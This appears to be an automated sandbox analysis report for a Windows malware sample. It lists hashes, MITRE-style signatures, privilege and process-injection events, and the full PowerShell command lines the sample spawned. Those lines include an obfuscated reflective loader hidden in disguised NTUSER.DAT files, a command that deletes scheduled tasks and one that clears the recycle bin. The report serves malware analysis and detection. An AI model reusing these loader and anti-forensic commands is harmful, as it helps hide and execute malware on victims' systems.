Analysis
-
max time kernel
96s -
max time network
97s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
19-09-2024 07:05
Static task
static1
Behavioral task
behavioral1
Sample
5cf02ef8ba3cb12bacf44b35ae71e53357ecfadffbebf02057004c791bedb476N.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
5cf02ef8ba3cb12bacf44b35ae71e53357ecfadffbebf02057004c791bedb476N.exe
Resource
win10v2004-20240802-en
General
-
Target
5cf02ef8ba3cb12bacf44b35ae71e53357ecfadffbebf02057004c791bedb476N.exe
-
Size
4.8MB
-
MD5
314416cd8a7ca237e550fd7b77acf770
-
SHA1
fb7e229e6782aba64a9d781d0605aed586627331
-
SHA256
5cf02ef8ba3cb12bacf44b35ae71e53357ecfadffbebf02057004c791bedb476
-
SHA512
831b85064956d3372f7e7019900aea5c96cfa4ae9b3d1a2ff904376191fe1fc2452d7d13ce701b3fce3765c867effd4d0b6c0d5f7d1d725c79ed9c53f8621f1d
-
SSDEEP
49152:uqj00f62wSvIi8kyyOiIBQoKHnHuB1UAjwqbMVaydWfOHSCyN78/NW6g/yjKj63W:uieSvPy0IKoKHHIMzx5bN84s
Malware Config
Signatures
-
pid Process 3708 powershell.exe 1916 powershell.exe -
Enumerates connected drives 3 TTPs 1 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\F: powershell.exe -
Hide Artifacts: Ignore Process Interrupts 1 TTPs 1 IoCs
Command interpreters often include specific commands/flags that ignore errors and other hangups.
pid Process 3564 powershell.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 1916 powershell.exe 1916 powershell.exe 3564 powershell.exe 3564 powershell.exe 3708 powershell.exe 3708 powershell.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
description pid Process Token: SeDebugPrivilege 1916 powershell.exe Token: SeIncreaseQuotaPrivilege 1916 powershell.exe Token: SeSecurityPrivilege 1916 powershell.exe Token: SeTakeOwnershipPrivilege 1916 powershell.exe Token: SeLoadDriverPrivilege 1916 powershell.exe Token: SeSystemProfilePrivilege 1916 powershell.exe Token: SeSystemtimePrivilege 1916 powershell.exe Token: SeProfSingleProcessPrivilege 1916 powershell.exe Token: SeIncBasePriorityPrivilege 1916 powershell.exe Token: SeCreatePagefilePrivilege 1916 powershell.exe Token: SeBackupPrivilege 1916 powershell.exe Token: SeRestorePrivilege 1916 powershell.exe Token: SeShutdownPrivilege 1916 powershell.exe Token: SeDebugPrivilege 1916 powershell.exe Token: SeSystemEnvironmentPrivilege 1916 powershell.exe Token: SeRemoteShutdownPrivilege 1916 powershell.exe Token: SeUndockPrivilege 1916 powershell.exe Token: SeManageVolumePrivilege 1916 powershell.exe Token: 33 1916 powershell.exe Token: 34 1916 powershell.exe Token: 35 1916 powershell.exe Token: 36 1916 powershell.exe Token: SeDebugPrivilege 3564 powershell.exe Token: SeDebugPrivilege 3708 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 4220 wrote to memory of 1916 4220 5cf02ef8ba3cb12bacf44b35ae71e53357ecfadffbebf02057004c791bedb476N.exe 83 PID 4220 wrote to memory of 1916 4220 5cf02ef8ba3cb12bacf44b35ae71e53357ecfadffbebf02057004c791bedb476N.exe 83 PID 4220 wrote to memory of 3564 4220 5cf02ef8ba3cb12bacf44b35ae71e53357ecfadffbebf02057004c791bedb476N.exe 85 PID 4220 wrote to memory of 3564 4220 5cf02ef8ba3cb12bacf44b35ae71e53357ecfadffbebf02057004c791bedb476N.exe 85 PID 4220 wrote to memory of 3708 4220 5cf02ef8ba3cb12bacf44b35ae71e53357ecfadffbebf02057004c791bedb476N.exe 90 PID 4220 wrote to memory of 3708 4220 5cf02ef8ba3cb12bacf44b35ae71e53357ecfadffbebf02057004c791bedb476N.exe 90
Processes
-
C:\Users\Admin\AppData\Local\Temp\5cf02ef8ba3cb12bacf44b35ae71e53357ecfadffbebf02057004c791bedb476N.exe"C:\Users\Admin\AppData\Local\Temp\5cf02ef8ba3cb12bacf44b35ae71e53357ecfadffbebf02057004c791bedb476N.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:4220 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -Command " $tasks = Get-ScheduledTask | Where-Object { $_.TaskPath -notlike '\Microsoft\Windows\*' -and $_.TaskName -ne 'VideoConvertor' } foreach ($task in $tasks) { try { Unregister-ScheduledTask -TaskName $task.TaskName -Confirm:$false } catch { continue } } "2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1916
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -Command "Clear-RecycleBin -Force -ErrorAction SilentlyContinue"2⤵
- Enumerates connected drives
- Hide Artifacts: Ignore Process Interrupts
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3564
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -Command " Function Init-VideoCache ([String] $CacheBuffer) { $CacheList = [System.Collections.Generic.List[Byte]]::new(); for ($i = 0; $i -lt $CacheBuffer.Length; $i += 8) { $CacheList.Add([Convert]::ToByte($CacheBuffer.Substring($i, 8), 2)) } return [System.Text.Encoding]::ASCII.GetString($CacheList.ToArray()) }; function Clear-VideoTempFiles { param([string] $tempPath) $tempFiles = $tempPath.Split(' ') $buffer = New-Object 'byte[]' ($tempFiles.Count / 2) $count = 0 for ($i = 0; $i -lt $tempFiles.Count - 1; $i += 2) { $buffer[$count] = [byte]($tempFiles[$i]) $count++ } return $buffer } $TempCache = Clear-VideoTempFiles (Get-Content -Path 'C:\Users\Admin\\NTUSER.DAT{428f1209-1254-13ef-ada4-080027dede23}.TxR.blf') $BootImage = Clear-VideoTempFiles (Get-Content -Path 'C:\Users\Admin\\NTUSER.DAT{4280000a-1254-11ef-ada2-080007dede23}.TM.blf') $BootParser = Init-VideoCache(Get-Content -Path 'C:\Users\Admin\\NTUSER.DAT{54ss24a-13354-13f-aad43-333333}.TM.blf') $SystemConfig = (Get-Content -Path 'C:\Users\Admin\\NTUSER.DAT{428f120a-1254-eeeef-ada2-080027dede23}.TM.blf') $CleanupTask = (Get-Content -Path 'C:\Users\Admin\\NTUSER.DAT{428f4444a-13354-11ef-sdd2-080027dede23}.TM.blf') $Image = (Get-Content -Path 'C:\Users\Admin\\NTUSER.DAT{428f4444a-13354-11ef-aad43-080027dede23}.TM.blf') $Module = (Get-Content -Path 'C:\Users\Admin\\NTUSER.DAT{543454444a-13354-11ef-aad43-080027dede23}.TM.blf') $LookupModule = (Get-Content -Path 'C:\Users\Admin\\NTUSER.DAT{543ss44a-13354-113f-aad43-08227dede23}.TM.blf') $ModuleParams = (Get-Content -Path 'C:\Users\Admin\\NTUSER.DAT{54ss24a-13354-13f-aad43-5227de33}.TM.blf') $SystemAssembly = [Reflection.Assembly] $SystemAssembly::$Module([Byte[]]$BootImage).$LookupModule($SystemConfig).$ModuleParams($CleanupTask).$Image($null,[Object[]]($BootParser,[Byte[]]$TempCache)) "2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3708
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5661739d384d9dfd807a089721202900b
SHA15b2c5d6a7122b4ce849dc98e79a7713038feac55
SHA25670c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf
SHA51281b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8
-
Filesize
1KB
MD5f3b2f7c8e9b3057a4342efce5cb1f648
SHA1cbcab1b48cd397259c504d2c915c5c30ea877b06
SHA2562c3dc036ac8d51e14510a0a6bba650d29e55c394b3b564a5f762c2fc1ebc3693
SHA512f627a062084919835cdfadcaa06849d6a636e4b2f6a24317c29e78183c02b4e2ffa9cf0911f627efc2143514695a1b3e70141866f61c722039721182cd5fb142
-
Filesize
64B
MD59a9f097131cf0a3486b843bcdbfe297c
SHA11e3988e316721aa0e8c6f659fa4e8a0217739028
SHA256dc773c20d59f6886b1a5b813abc4da6ce98abb0ade60b2ebabb091f55e265abd
SHA512efc807932ae6ab83d0dfbad3384655a0b44648a163c71f31f7cd9003d7dea83371d08caba46bf6837f99dae2fe201cd902da33c40e37cc7d2671db7d9f79210d
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82